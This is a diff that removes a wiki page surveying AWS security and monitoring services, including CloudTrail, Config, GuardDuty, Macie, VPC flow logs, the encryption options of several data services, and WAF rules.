-Note that in order to allow CloudTrail to send the logs to CloudWatch a **role** needs to be created that allows that action. If possible, it's recommended to use AWS default role to perform these actions. This role will allow CloudTrail to:
-
-* CreateLogStream: This allows to create a CloudWatch Logs log streams
-* PutLogEvents: Deliver CloudTrail logs to CloudWatch Logs log stream
-
-## Event History
-
-CloudTrail Event History allows you to inspect in a table the logs that have been recorded:
-
-![](<../.gitbook/assets/image (431).png>)
-
-## Insights
-
-**CloudTrail Insights** automatically **analyzes** write management events from CloudTrail trails and **alerts** you to **unusual activity**. For example, if there is an increase in `TerminateInstance` events that differs from established baselines, youβll see it as an Insight event. These events make **finding and responding to unusual API activity easier** than ever.
-
-# CloudWatch
-
-Amazon CloudWatch allows to **collect all of your logs in a single repository** where you can create **metrics** and **alarms** based on the logs.\
-CloudWatch Log Event have a **size limitation of 256KB of each log line**.
-
-You can monitor for example logs from CloudTrail.\
-Events that are monitored:
-
-* Changes to Security Groups and NACLs
-* Starting, Stopping, rebooting and terminating EC2instances
-* Changes to Security Policies within IAM and S3
-* Failed login attempts to the AWS Management Console
-* API calls that resulted in failed authorization
-* Filters to search in cloudwatch: [https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html](https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html)
-
-## Agent Installation
-
-You can install agents insie your machines/containers to automatically send the logs back to CloudWatch.
-
-* **Create** a **role** and **attach** it to the **instance** with permissions allowing CloudWatch to collect data from the instances in addition to interacting with AWS systems manager SSM (CloudWatchAgentAdminPolicy & AmazonEC2RoleforSSM)
-* **Download** and **install** the **agent** onto the EC2 instance ([https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip](https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip)). You can download it from inside the EC2 or install it automatically using AWS System Manager selecting the package AWS-ConfigureAWSPackage
-* **Configure** and **start** the CloudWatch Agent
-
-A log group has many streams. A stream has many events. And inside of each stream, the events are guaranteed to be in order.
-
-# Cost Explorer and Anomaly detection
-
-This allows you to check how are you expending money in AWS services and help you **detecting anomalies**.\
-Moreover, you can configure an anomaly detection so AWS will warn you when some anomaly in costs is found.
-
-## Budgets
-
-Budgets help to manage costs and usage. You can get **alerted when a threshold is reached**.\
-Also, they can be used for non cost related monitoring like the usage of a service (how many GB are used in a particular S3 bucket?).
-
-# AWS Config
-
-AWS Config **capture resource changes**, so any change to a resource supported by Config can be recorded, which will **record what changed along with other useful metadata, all held within a file known as a configuration item**, a CI.\
-This service is **region specific**.
-
-A configuration item or **CI** as it's known, is a key component of AWS Config. It is comprised of a JSON file that **holds the configuration information, relationship information and other metadata as a point-in-time snapshot view of a supported resource**. All the information that AWS Config can record for a resource is captured within the CI. A CI is created **every time** a supported resource has a change made to its configuration in any way. In addition to recording the details of the affected resource, AWS Config will also record CIs for any directly related resources to ensure the change did not affect those resources too.
-
-* **Metadata**: Contains details about the configuration item itself. A version ID and a configuration ID, which uniquely identifies the CI. Ither information can include a MD5Hash that allows you to compare other CIs already recorded against the same resource.
-* **Attributes**: This holds common **attribute information against the actual resource**. Within this section, we also have a unique resource ID, and any key value tags that are associated to the resource. The resource type is also listed. For example, if this was a CI for an EC2 instance, the resource types listed could be the network interface, or the elastic IP address for that EC2 instance
-* **Relationships**: This holds information for any connected **relationship that the resource may have**. So within this section, it would show a clear description of any relationship to other resources that this resource had. For example, if the CI was for an EC2 instance, the relationship section may show the connection to a VPC along with the subnet that the EC2 instance resides in.
-* **Current configuration:** This will display the same information that would be generated if you were to perform a describe or list API call made by the AWS CLI. AWS Config uses the same API calls to get the same information.
-* **Related events**: This relates to AWS CloudTrail. This will display the **AWS CloudTrail event ID that is related to the change that triggered the creation of this CI**. There is a new CI made for every change made against a resource. As a result, different CloudTrail event IDs will be created.
-
-**Configuration History**: It's possible to obtain the configuration history of resources thanks to the configurations items. A configuration history is delivered every 6 hours and contains all CI's for a particular resource type.
-
-**Configuration Streams**: Configuration items are sent to an SNS Topic to enable analysis of the data.
-
-**Configuration Snapshots**: Configuration items are used to create a point in time snapshot of all supported resources.
-
-**S3 is used to store** the Configuration History files and any Configuration snapshots of your data within a single bucket, which is defined within the Configuration recorder. If you have multiple AWS accounts you may want to aggregate your configuration history files into the same S3 bucket for your primary account. However, you'll need to grant write access for this service principle, config.amazonaws.com, and your secondary accounts with write access to the S3 bucket in your primary account.
-
-## Config Rules
-
-Config rules are a great way to help you **enforce specific compliance checks** **and controls across your resources**, and allows you to adopt an ideal deployment specification for each of your resource types. Each rule **is essentially a lambda function** that when called upon evaluates the resource and carries out some simple logic to determine the compliance result with the rule. **Each time a change is made** to one of your supported resources, **AWS Config will check the compliance against any config rules that you have in place**.\
-AWS have a number of **predefined rules** that fall under the security umbrella that are ready to use. For example, Rds-storage-encrypted. This checks whether storage encryption is activated by your RDS database instances. Encrypted-volumes. This checks to see if any EBS volumes that have an attached state are encrypted.
-
-* **AWS Managed rules**: Set of predefined rules that cover a lot of best practices, so it's always worth browsing these rules first before setting up your own as there is a chance that the rule may already exist.
-* **Custom rules**: You can create your own rules to check specific customconfigurations.
-
-Limit of 50 config rules per region before you need to contact AWS for an increase.\
-Non compliant results are NOT deleted.
-
-# SNS Topic
-
-SNS topic is used as a **configuration stream for notifications** from different AWS services like Config or CloudWatch alarms.\
-You can have various endpoints associated to the SNS stream.\
-You can use SNS topic to send notifications to you via email or to SQS to treate programatically the notification.
-
-# Inspector
-
-The Amazon Inspector service is **agent based**, meaning it requires software agents to be **installed on any EC2 instances** you want to assess. This makes it an easy service to be configured and added at any point to existing resources already running within your AWS infrastructure. This helps Amazon Inspector to become a seamless integration with any of your existing security processes and procedures as another level of security.
-
-These are the tests that AWS Inspector allow you to perform:
-
-* **CVEs**
-* **CIS Benchmarks**
-* **Security Best practices**
-* **Network Reachability**
-
-You can make any of those run on the EC2 machines you decide.
-
-## Element of AWS Inspector
-
-**Role**: Create or select a role to allow Amazon Inspector to have read only access to the EC2 instances (DescribeInstances)\
-**Assessment Targets**: Group of EC2 instances that you want to run an assessment against\
-**AWS agents**: Software agents that must be install on EC2 instances to monitor. Data is sent to Amazon Inspector using a TLS channel. A regular heartbeat is sent from the agent to the inspector asking for instructions. It can autoupdate itself\
-**Assessment Templates**: Define specific configurations as to how an assessment is run on your EC2 instances. An assessment template cannot be modified after creation.
-
-* Rules packages to be used
-* Duration of the assessment run 15min/1hour/8hours
-* SNS topics, select when notify: Starts, finished, change state, reports a finding
-* Attributes to b assigned to findings
-
-**Rule package**: Contains a number of individual rules that are check against an EC2 when an assessment is run. Each one also have a severity (high, medium, low, informational). The possibilities are:
-
-* Common Vulnerabilities and Exposures (CVEs)
-* Center for Internet Security (CIS) Benchmark
-* Security Best practices
-
-Once you have configured the Amazon Inspector Role, the AWS Agents are Installed, the target is configured and the template is configured, you will be able to run it. An assessment run can be stopped, resumed, or deleted.
-
-Amazon Inspector has a pre-defined set of rules, grouped into packages. Each Assessment Template defines which rules packages to be included in the test. Instances are being evaluated against rules packages included in the assessment template.
-
-{% hint style="info" %}
-Note that nowadays AWS already allow you to **autocreate** all the necesary **configurations** and even automatically **install the agents inside the EC2 instances.**
-{% endhint %}
-
-## **Reporting**
-
-**Telemetry**: data that is collected from an instance, detailing its configuration, behavior and processes during an assessment run. Once collected, the data is then sent back to Amazon Inspector in near-real-time over TLS where it is then stored and encrypted on S3 via an ephemeral KMS key. Amazon Inspector then accesses the S3 Bucket, decrypts the data in memory, and analyzes it against any rules packages used for that assessment to generate the findings.
-
-**Assessment Report**: Provide details on what was assessed and the results of the assessment.
-
-* The **findings report** contain the summary of the assessment, info about the EC2 and rules and the findings that occurred.
-* The **full report** is the finding report + a list of rules that were passed.
-
-# Trusted Advisor
-
-The main function of Trusted Advisor is to **recommend improvements across your AWS account** to help optimize and hone your environment based on **AWS best practices**. These recommendations cover four distinct categories. It's a is a cross-region service.
-
-1. **Cost optimization:** which helps to identify ways in which you could **optimize your resources** to save money.
-2. **Performance:** This scans your resources to highlight any **potential performance issues** across multiple services.
-3. **Security:** This category analyzes your environment for any **potential security weaknesses** or vulnerabilities.
-4. **Fault tolerance:** Which suggests best practices to **maintain service operations** by increasing resiliency should a fault or incident occur across your resources.
-
-The full power and potential of AWS Trusted Advisor is only really **available if you have a business or enterprise support plan with AWS**. **Without** either of these plans, then you will only have access to **six core checks** that are freely available to everyone. These free core checks are split between the performance and security categories, with the majority of them being related to security. These are the 6 checks: service limits, Security Groups Specific Ports Unrestricted, Amazon EBS Public Snapshots, Amazon RDS Public Snapshots, IAM Use, and MFA on root account.\
-Trusted advisor can send notifications and you can exclude items from it.\
-Trusted advisor data is **automatically refreshed every 24 hours**, **but** you can perform a **manual one 5 mins after the previous one.**
-
-# Amazon GuardDuty
-
-Amazon GuardDuty is a regional-based intelligent **threat detection service**, the first of its kind offered by AWS, which allows users to **monitor** their **AWS account** for **unusual and unexpected behavior by analyzing VPC Flow Logs, AWS CloudTrail management event logs, Cloudtrail S3 data event logs, and DNS logs**. It uses **threat intelligence feeds**, such as lists of malicious IP addresses and domains, and **machine learning** to identify **unexpected and potentially unauthorized and malicious activity** within your AWS environment. This can include issues like escalations of privileges, uses of exposed credentials, or communication with malicious IP addresses, or domains.\
-For example, GuardDuty can detect compromised EC2 instances serving malware or mining bitcoin. It also monitors AWS account access behavior for signs of compromise, such as unauthorized infrastructure deployments, like instances deployed in a Region that has never been used, or unusual API calls, like a password policy change to reduce password strength.\
-You can **upload list of whitelisted and blacklisted IP addresses** so GuardDuty takes that info into account.
-
-Finding summary:
-
-* Finding type
-* Severity: 7-8.9High, 4-6.9Medium, 01-3.9Low
-* Region
-* Account ID
-* Resource ID
-* Time of detection
-* Which threat list was used
-
-The body has this information:
-
-* Resource affected
-* Action
-* Actor: Ip address, port and domain
-* Additional Information
-
-You can invite other accounts to a different AWS GuardDuty account so **every account is monitored from the same GuardDuty**. The master account must invite the member accounts and then the representative of the member account must accept the invitation.\
-There are different IAM Role permissions to allow GuardDuty to get the information and to allow a user to upload IPs whitelisted and blacklisted.\
-GuarDuty uses a service-linked role called "AWSServiceRoleForAmazonGuardDuty" that allows it to retrieve metadata from affected endpoints.
-
-You pay for the processing of your log files, per 1 million events per months from CloudTrail and per GB of analysed logs from VPC Flow
-
-When a user disable GuardDuty, it will stop monitoring your AWS environment and it won't generate any new findings at all, and the existing findings will be lost.\
-If you just stop it, the existing findings will remain.
-
-# Amazon Macie
-
-The main function of the service is to provide an automatic method of **detecting, identifying, and also classifying data** that you are storing within your AWS account.
-
-The service is backed by **machine learning**, allowing your data to be actively reviewed as different actions are taken within your AWS account. Machine learning can spot access patterns and **user behavior** by analyzing **cloud trail event** data to **alert against any unusual or irregular activity**. Any findings made by Amazon Macie are presented within a dashboard which can trigger alerts, allowing you to quickly resolve any potential threat of exposure or compromise of your data.
-
-Amazon Macie will automatically and continuously **monitor and detect new data that is stored in Amazon S3**. Using the abilities of machine learning and artificial intelligence, this service has the ability to familiarize over time, access patterns to data. \
-Amazon Macie also uses natural language processing methods to **classify and interpret different data types and content**. NLP uses principles from computer science and computational linguistics to look at the interactions between computers and the human language. In particular, how to program computers to understand and decipher language data. The **service can automatically assign business values to data that is assessed in the form of a risk score**. This enables Amazon Macie to order findings on a priority basis, enabling you to focus on the most critical alerts first. In addition to this, Amazon Macie also has the added benefit of being able to **monitor and discover security changes governing your data**. As well as identify specific security-centric data such as access keys held within an S3 bucket.
-
-This protective and proactive security monitoring enables Amazon Macie to identify critical, sensitive, and security focused data such as API keys, secret keys, in addition to PII (personally identifiable information) and PHI data.
-
-This is useful to avoid data leaks as Macie will detect if you are exposing people information to the Internet.
-
-It's a **regional service**.
-
-It requires the existence of IAM Role 'AWSMacieServiceCustomerSetupRole' and it needs AWS CloudTrail to be enabled.
-
-Pre-defined alerts categories:
-
-* Anonymized access
-* Config compliance
-* Credential Loss
-* Data compliance
-* Files hosting
-* Identity enumeration
-* Information loss
-* Location anomaly
-* Open permissions
-* Privilege escalation
-* Ransomware
-* Service disruption
-* Suspicious access
-
-The **alert summary** provides detailed information to allow you to respond appropriately. It has a description that provides a deeper level of understanding of why it was generated. It also has a breakdown of the results.
-
-The user has the possibility to create new custom alerts.
-
-**Dashboard categorization**:
-
-* S3 Objects for selected time range
-* S3 Objects
-* S3 Objects by PII - Personally Identifiable Information
-* S3 Objects by ACL
-* High-risk CloudTrail events and associated users
-* High-risk CloudTrail errors and associated users
-* Activity Location
-* CloudTrail Events
-* Activity ISPs
-* CloudTrail user identity types
-
-**User Categories**: Macie categorises the users in the following categories:
-
-* **Platinum**: Users or roles considered to be making high risk API calls. Often they have admins privileges. You should monitor the pretty god in case they are compromised
-* **Gold**: Users or roles with history of calling APIs related to infrastructure changes. You should also monitor them
-* **Silver**: Users or roles performing medium level risk API calls
-* **Bronze**: Users or roles using lowest level of risk based on API calls
-
-**Identity types:**
-
-* Root: Request made by root user
-* IAM user: Request made by IAM user
-* Assumed Role: Request made by temporary assumed credentials (AssumeRole API for STS)
-* Federated User: Request made using temporary credentials (GetFederationToken API fro STS)
-* AWS Account: Request made by a different AWS account
-* AWS Service: Request made by an AWS service
-
-**Data classification**: 4 file classifications exists:
-
-* Content-Type: list files based on content-type detected. The given risk is determined by the type of content detected.
-* File Extension: Same as content-type but based on the extension
-* Theme: Categorises based on a series of keywords detected within the files
-* Regex: Categories based on specific regexps
-
-The final risk of a file will be the highest risk found between those 4 categories
-
-The research function allows to create you own queries again all Amazon Macie data and perform a deep dive analysis of the data. You can filter results based on: CloudTrail Data, S3 Bucket properties and S3 Objects
-
-It possible to invite other accounts to Amazon Macie so several accounts share Amazon Macie.
-
-# Route 53
-
-You can very easily create **health checks for web pages** via Route53. For example you can create HTTP checks on port 80 to a page to check that the web server is working.
-
-Route 53 service is mainly used for checking the health of the instances. To check the health of the instances we can ping a certain DNS point and we should get response from the instance if the instances are healthy.
-
-# CloufFront
-
-Amazon CloudFront is AWS's **content delivery network that speeds up distribution** of your static and dynamic content through its worldwide network of edge locations. When you use a request content that you're hosting through Amazon CloudFront, the request is routed to the closest edge location which provides it the lowest latency to deliver the best performance. When **CloudFront access logs** are enabled you can record the request from each user requesting access to your website and distribution. As with S3 access logs, these logs are also **stored on Amazon S3 for durable and persistent storage**. There are no charges for enabling logging itself, however, as the logs are stored in S3 you will be stored for the storage used by S3.
-
-The log files capture data over a period of time and depending on the amount of requests that are received by Amazon CloudFront for that distribution will depend on the amount of log fils that are generated. It's important to know that these log files are not created or written to on S3. S3 is simply where they are delivered to once the log file is full. **Amazon CloudFront retains these logs until they are ready to be delivered to S3**. Again, depending on the size of these log files this delivery can take **between one and 24 hours**.
-
-**By default cookie logging is disabled** but you can enable it.
-
-# VPC
-
-## VPC Flow Logs
-
-Within your VPC, you could potentially have hundreds or even thousands of resources all communicating between different subnets both public and private and also between different VPCs through VPC peering connections. **VPC Flow Logs allows you to capture IP traffic information that flows between your network interfaces of your resources within your VPC**.
-
-Unlike S3 access logs and CloudFront access logs, the **log data generated by VPC Flow Logs is not stored in S3. Instead, the log data captured is sent to CloudWatch logs**.
-
-Limitations:
-
-* If you are running a VPC peered connection, then you'll only be able to see flow logs of peered VPCs that are within the same account.
-* If you are still running resources within the EC2-Classic environment, then unfortunately you are not able to retrieve information from their interfaces
-* Once a VPC Flow Log has been created, it cannot be changed. To alter the VPC Flow Log configuration, you need to delete it and then recreate a new one.
-* The following traffic is not monitored and captured by the logs. DHCP traffic within the VPC, traffic from instances destined for the Amazon DNS Server.
-* Any traffic destined to the IP address for the VPC default router and traffic to and from the following addresses, 169.254.169.254 which is used for gathering instance metadata, and 169.254.169.123 which is used for the Amazon Time Sync Service.
-* Traffic relating to an Amazon Windows activation license from a Windows instance
-* Traffic between a network load balancer interface and an endpoint network interface
-
-For every network interface that publishes data to the CloudWatch log group, it will use a different log stream. And within each of these streams, there will be the flow log event data that shows the content of the log entries. Each of these **logs captures data during a window of approximately 10 to 15 minutes**.
-
-![](<../.gitbook/assets/image (432).png>)
-
-![](<../.gitbook/assets/image (433).png>)
-
-## Subnets
-
-Subnets helps to enforce a greater level of security. **Logical grouping of similar resources** also helps you to maintain an **ease of management** across your infrastructure.\
-Valid CIDR are from a /16 netmask to a /28 netmask.\
-A subnet cannot be in different availability zones at the same time.
-
-By having **multiple Subnets with similar resources grouped together**, it allows for greater security management. By implementing **network level virtual firewalls,** called network access control lists, or **NACLs**, it's possible to **filter traffic** on specific ports from both an ingress and egress point at the Subnet level.
-
-When you create a subnet the **network** and **broadcast address** of the subnet **can't be used** for host addresses and **AWS reserves the first three host IP addresses** of each subnet **for** **internal AWS usage**: he first host address used is for the VPC router. The second address is reserved for AWS DNS and the third address is reserved for future use.
-
-It's called **public subnets** to those that have **direct access to the Internet, whereas private subnets do not.**
-
-In order to make a subnet public you need to **create** and **attach** an **Internet gateway** to your VPC. This Internet gateway is a managed service, controlled, configured, and maintained by AWS. It scales horizontally automatically, and is classified as a highly valuable component of your VPC infrastructure. Once your Internet gateway is attached to your VPC, you have a gateway to the Internet. However, at this point, your instances have no idea how to get out to the Internet. As a result, you need to add a default route to the route table associated with your subnet. The route could have a **destination value of 0.0. 0. 0/0, and the target value will be set as your Internet gateway ID**.
-
-By default, all subnets have the automatic assigned of public IP addresses turned off but it can be turned on.
-
-**A local route within a route table enables communication between VPC subnets.**
-
-If you are **connection a subnet with a different subnet you cannot access the subnets connected** with the other subnet, you need to create connection with them directly. **This also applies to internet gateways**. You cannot go through a subnet connection to access internet, you need to assign the internet gateway to your subnet.
-
-## VPC Peering
-
-VPC peering allows you to **connect two or more VPCs together**, using IPV4 or IPV6, as if they were a part of the same network.
-
-Once the peer connectivity is established, **resources in one VPC can access resources in the other**. The connectivity between the VPCs is implemented through the existing AWS network infrastructure, and so it is highly available with no bandwidth bottleneck. As **peered connections operate as if they were part of the same network**, there are restrictions when it comes to your CIDR block ranges that can be used.\
-If you have **overlapping or duplicate CIDR** ranges for your VPC, then **you'll not be able to peer the VPCs** together.\
-Each AWS VPC will **only communicate with its peer**. As an example, if you have a peering connection between VPC 1 and VPC 2, and another connection between VPC 2 and VPC 3 as shown, then VPC 1 and 2 could communicate with each other directly, as can VPC 2 and VPC 3, however, VPC 1 and VPC 3 could not. **You can't route through one VPC to get to another.**
-
-# AWS Secrets Manager
-
-AWS Secrets Manager is a great service to enhance your security posture by allowing you to **remove any hard-coded secrets within your application and replacing them with a simple API call** to the aid of your secrets manager which then services the request with the relevant secret. As a result, AWS Secrets Manager acts as a **single source of truth for all your secrets across all of your applications**.
-
-AWS Secrets Manager enables the **ease of rotating secrets** and therefore enhancing the security of that secret. An example of this could be your database credentials. Other secret types can also have automatic rotation enabled through the use of lambda functions, for example, API keys.
-
-Access to your secrets within AWS Secret Manager is governed by fine-grained IAM identity-based policies in addition to resource-based policies.
-
-To allow a user form a different account to access your secret you need to authorize him to access the secret and also authorize him to decrypt the secret in KMS. The Key policy also needs to allows the external user to use it.
-
-**AWS Secrets Manager integrates with AWS KMS to encrypt your secrets within AWS Secrets Manager.**
-
-# EMR
-
-EMR is a managed service by AWS and is comprised of a **cluster of EC2 instances that's highly scalable** to process and run big data frameworks such Apache Hadoop and Spark.
-
-From EMR version 4.8.0 and onwards, we have the ability to create a **security configuration** specifying different settings on **how to manage encryption for your data within your clusters**. You can either encrypt your data at rest, data in transit, or if required, both together. The great thing about these security configurations is they're not actually a part of your EC2 clusters.
-
-One key point of EMR is that **by default, the instances within a cluster do not encrypt data at rest**. Once enabled, the following features are available.
-
-* **Linux Unified Key Setup:** EBS cluster volumes can be encrypted using this method whereby you can specify AWS **KMS** to be used as your key management provider, or use a custom key provider.
-* **Open-Source HDFS encryption:** This provides two Hadoop encryption options. Secure Hadoop RPC which would be set to privacy which uses simple authentication security layer, and data encryption of HDFS Block transfer which would be set to true to use the AES-256 algorithm.
-
-From an encryption in transit perspective, you could enable **open source transport layer security** encryption features and select a certificate provider type which can be either PEM where you will need to manually create PEM certificates, bundle them up with a zip file and then reference the zip file in S3 or custom where you would add a custom certificate provider as a Java class that provides encryption artefacts.
-
-Once the TLS certificate provider has been configured in the security configuration file, the following encryption applications specific encryption features can be enabled which will vary depending on your EMR version.
-
-* Hadoop might reduce encrypted shuffle which uses TLS. Both secure Hadoop RPC which uses Simple Authentication Security Layer, and data encryption of HDFS Block Transfer which uses AES-256, are both activated when at rest encryption is enabled in the security configuration.
-* Presto: When using EMR version 5.6.0 and later, any internal communication between Presto nodes will use SSL and TLS.
-* Tez Shuffle Handler uses TLS.
-* Spark: The Akka protocol uses TLS. Block Transfer Service uses Simple Authentication Security Layer and 3DES. External shuffle service uses the Simple Authentication Security Layer.
-
-# RDS - Relational Database Service
-
-RDS allows you to set up a **relational database** using a number of **different engines** such as MySQL, Oracle, SQL Server, etc. During the creation of your RDS database instance, you have the opportunity to **Enable Encryption at the Configure Advanced Settings** screen under Database Options and Enable Encryption.
-
-By enabling your encryption here, you are enabling **encryption at rest for your storage, snapshots, read replicas and your back-ups**. Keys to manage this encryption can be issued by using **KMS**. It's not possible to add this level of encryption after your database has been created. **It has to be done during its creation**.
-
-However, there is a **workaround allowing you to encrypt an unencrypted database as follows**. You can create a snapshot of your unencrypted database, create an encrypted copy of that snapshot, use that encrypted snapshot to create a new database, and then, finally, your database would then be encrypted.
-
-Amazon RDS **sends data to CloudWatch every minute by default.**
-
-In addition to encryption offered by RDS itself at the application level, there are **additional platform level encryption mechanisms** that could be used for protecting data at rest including **Oracle and SQL Server Transparent Data Encryption**, known as TDE, and this could be used in conjunction with the method order discussed but it would **impact the performance** of the database MySQL cryptographic functions and Microsoft Transact-SQL cryptographic functions.
-
-If you want to use the TDE method, then you must first ensure that the database is associated to an option group. Option groups provide default settings for your database and help with management which includes some security features. However, option groups only exist for the following database engines and versions.
-
-Once the database is associated with an option group, you must ensure that the Oracle Transparent Data Encryption option is added to that group. Once this TDE option has been added to the option group, it cannot be removed. TDE can use two different encryption modes, firstly, TDE tablespace encryption which encrypts entire tables and, secondly, TDE column encryption which just encrypts individual elements of the database.
-
-# Amazon Kinesis Firehouse
-
-Amazon Firehose is used to deliver **real-time streaming data to different services** and destinations within AWS, many of which can be used for big data such as S3 Redshift and Amazon Elasticsearch.
-
-The service is fully managed by AWS, taking a lot of the administration of maintenance out of your hands. Firehose is used to receive data from your data producers where it then automatically delivers the data to your chosen destination.
-
-Amazon Streams essentially collects and processes huge amounts of data in real time and makes it available for consumption.
-
-This data can come from a variety of different sources. For example, log data from the infrastructure, social media, web clicks during feeds, market data, etc. So now we have a high-level overview of each of these. We need to understand how they implement encryption of any data process in stored should it be required.
-
-When clients are **sending data to Kinesis in transit**, the data can be sent over **HTTPS**, which is HTTP with SSL encryption. However, once it enters the Kinesis service, it is then unencrypted by default. Using both **Kinesis Streams and Firehose encryption, you can assure your streams remain encrypted up until the data is sent to its final destination.** As **Amazon Streams** now has the ability to implement SSE encryption using KMS to **encrypt data as it enters the stream** directly from the producers.
-
-If Amazon **S3** is used as a **destination**, Firehose can implement encryption using **SSE-KMS on S3**.
-
-As a part of this process, it's important to ensure that both producer and consumer applications have permissions to use the KMS key. Otherwise encryption and decryption will not be possible, and you will receive an unauthorized KMS master key permission error.
-
-Kinesis SSE encryption will typically call upon KMS to **generate a new data key every five minutes**. So, if you had your stream running for a month or more, thousands of data keys would be generated within this time frame.
-
-# Amazon Redshift
-
-Redshift is a fully managed service that can scale up to over a petabyte in size, which is used as a **data warehouse for big data solutions**. Using Redshift clusters, you are able to run analytics against your datasets using fast, SQL-based query tools and business intelligence applications to gather greater understanding of vision for your business.
-
-**Redshift offers encryption at rest using a four-tired hierarchy of encryption keys using either KMS or CloudHSM to manage the top tier of keys**. **When encryption is enabled for your cluster, it can't be disable and vice versa**. When you have an unencrypted cluster, it can't be encrypted.
-
-Encryption for your cluster can only happen during its creation, and once encrypted, the data, metadata, and any snapshots are also encrypted. The tiering level of encryption keys are as follows, **tier one is the master key, tier two is the cluster encryption key, the CEK, tier three, the database encryption key, the DEK, and finally tier four, the data encryption keys themselves**.
-
-## KMS
-
-During the creation of your cluster, you can either select the **default KMS key** for Redshift or select your **own CMK**, which gives you more flexibility over the control of the key, specifically from an auditable perspective.
-
-The default KMS key for Redshift is automatically created by Redshift the first time the key option is selected and used, and it is fully managed by AWS. The CMK is known as the master key, tier one, and once selected, Redshift can enforce the encryption process as follows. So Redshift will send a request to KMS for a new KMS key.
-
-So Redshift will send a request to KMS for a new KMS key.
-
-This KMS key is then encrypted with the CMK master key, tier one. This encrypted KMS data key is then used as the cluster encryption key, the CEK, tier two. This CEK is then sent by KMS to Redshift where it is stored separately from the cluster. Redshift then sends this encrypted CEK to the cluster over a secure channel where it is stored in memory.
-
-Redshift then requests KMS to decrypt the CEK, tier two. This decrypted CEK is then also stored in memory. Redshift then creates a random database encryption key, the DEK, tier three, and loads that into the memory of the cluster. The decrypted CEK in memory then encrypts the DEK, which is also stored in memory.
-
-This encrypted DEK is then sent over a secure channel and stored in Redshift separately from the cluster. Both the CEK and the DEK are now stored in memory of the cluster both in an encrypted and decrypted form. The decrypted DEK is then used to encrypt data keys, tier four, that are randomly generated by Redshift for each data block in the database.
-
-You can use AWS Trusted Advisor to monitor the configuration of your Amazon S3 buckets and ensure that bucket logging is enabled, which can be useful for performing security audits and tracking usage patterns in S3.
-
-## CloudHSM
-
-When working with CloudHSM to perform your encryption, firstly you must set up a trusted connection between your HSM client and Redshift while using client and server certificates.
-
-This connection is required to provide secure communications, allowing encryption keys to be sent between your HSM client and your Redshift clusters. Using a randomly generated private and public key pair, Redshift creates a public client certificate, which is encrypted and stored by Redshift. This must be downloaded and registered to your HSM client, and assigned to the correct HSM partition.
-
-You must then configure Redshift with the following details of your HSM client: the HSM IP address, the HSM partition name, the HSM partition password, and the public HSM server certificate, which is encrypted by CloudHSM using an internal master key. Once this information has been provided, Redshift will confirm and verify that it can connect and access development partition.
-
-If your internal security policies or governance controls dictate that you must apply key rotation, then this is possible with Redshift enabling you to rotate encryption keys for encrypted clusters, however, you do need to be aware that during the key rotation process, it will make a cluster unavailable for a very short period of time, and so it's best to only rotate keys as and when you need to, or if you feel they may have been compromised.
-
-During the rotation, Redshift will rotate the CEK for your cluster and for any backups of that cluster. It will rotate a DEK for the cluster but it's not possible to rotate a DEK for the snapshots stored in S3 that have been encrypted using the DEK. It will put the cluster into a state of 'rotating keys' until the process is completed when the status will return to 'available'.
-
-# WAF
-
-AWS WAF is a web application firewall that helps **protect your web applications** or APIs against common web exploits that may affect availability, compromise security, or consume excessive resources. AWS WAF gives you control over **how traffic reaches your applications** by enabling you to create security rules that block common attack patterns, such as SQL injection or cross-site scripting, and rules that filter out specific traffic patterns you define.
-
-So there are a number of essential components relating to WAF, these being: Conditions, Rules and Web access control lists, also known as Web ACLs
-
-## Conditions
-
-Conditions allow you to specify **what elements of the incoming HTTP or HTTPS request you want WAF to be monitoring** (XSS, GEO - filtering by location-, IP address, Size constraints, SQL Injection attacks, strings and regex matching). Note that if you are restricting a country from cloudfront, this request won't arrive to the waf.
-
-You can have **100 conditions of each type**, such as Geo Match or size constraints, however **Regex** is the **exception** to this rule where **only 10 Regex** conditions are allowed but this limit is possible to increase. You are able to have **100 rules and 50 Web ACLs per AWS account**. You are limited to **5 rate-based-rules** per account. Finally you can have **10,000 requests per second** when **using WAF** within your application load balancer.
-
-## Rules
-
-Using these conditions you can create rules: For example, block request if 2 conditions are met.\
-When creating your rule you will be asked to select a **Rule Type**: **Regular Rule** or **Rate-Based Rule**.
-
-The only **difference** between a rate-based rule and a regular rule is that **rate-based** rules **count** the **number** of **requests** that are being received from a particular IP address over a time period of **five minutes**.
-
-When you select a rate-based rule option, you are asked to **enter the maximum number of requests from a single IP within a five minute time frame**. When the count limit is **reached**, **all other requests from that same IP address is then blocked**. If the request rate falls back below the rate limit specified the traffic is then allowed to pass through and is no longer blocked. When setting your rate limit it **must be set to a value above 2000**. Any request under this limit is considered a Regular Rule.
-
-## Actions
-
-An action is applied to each rule, these actions can either be **Allow**, **Block** or **Count**.
-
-* When a request is **allowed**, it is **forwarded** onto the relevant CloudFront distribution or Application Load Balancer.
-* When a request is **blocked**, the request is **terminated** there and no further processing of that request is taken.
-* A **Count** action will **count the number of requests that meet the conditions** within that rule. This is a really good option to select when testing the rules to ensure that the rule is picking up the requests as expected before setting it to either Allow or Block.
-
-If an **incoming request does not meet any rule** within the Web ACL then the request takes the action associated to a **default action** specified which can either be **Allow** or **Block**. An important point to make about these rules is that they are **executed in the order that they are listed within a Web ACL**. So be careful to architect this order correctly for your rule base, **typically** these are **ordered** as shown:
-
-1. WhiteListed Ips as Allow.
-2. BlackListed IPs Block
-3. Any Bad Signatures also as Block.
-
-## CloudWatch
-
-WAF CloudWatch metrics are reported **in one minute intervals by default** and are kept for a two week period. The metrics monitored are AllowedRequests, BlockedRequests, CountedRequests, and PassedRequests.
-
-# AWS Firewall Manager
-
-AWS Firewall Manager simplifies your administration and maintenance tasks across multiple accounts and resources for **AWS WAF, AWS Shield Advanced, Amazon VPC security groups, and AWS Network Firewall**. With Firewall Manager, you set up your AWS WAF firewall rules, Shield Advanced protections, Amazon VPC security groups, and Network Firewall firewalls just once. The service **automatically applies the rules and protections across your accounts and resources**, even as you add new resources.
-
-It can **group and protect specific resources together**, for example, all resources with a particular tag or all of your CloudFront distributions. One key benefit of Firewall Manager is that it **automatically protects certain resources that are added** to your account as they become active.
-
-**Requisites**: Created a Firewall Manager Master Account, setup an AWS organization and have added our member accounts and enable AWS Config.
-
